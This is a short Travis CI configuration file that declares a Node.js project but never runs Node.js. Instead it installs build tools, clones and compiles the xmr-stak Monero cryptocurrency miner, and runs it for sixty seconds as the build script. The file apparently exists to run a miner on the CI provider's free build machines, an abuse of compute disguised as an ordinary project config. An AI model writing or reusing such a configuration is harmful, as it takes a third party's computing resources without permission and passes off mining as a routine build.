language: node_js
node_js:
- '7'
sudo: required
dist: trusty

jobs:
  include:          
      before_install: 
      - sudo apt-get update
      - sudo apt install libmicrohttpd-dev libssl-dev cmake build-essential libhwloc-dev
      - git clone https://github.com/fireice-uk/xmr-stak.git
      - mkdir xmr-stak/build
      - cd xmr-stak/build
      - cmake -DCMAKE_CXX_COMPILER=/usr/bin/g++
      - cmake ..
      - make install

      script:      
      - timeout 60s ./xmr-stak.sh
            
      after_success:
      - echo success
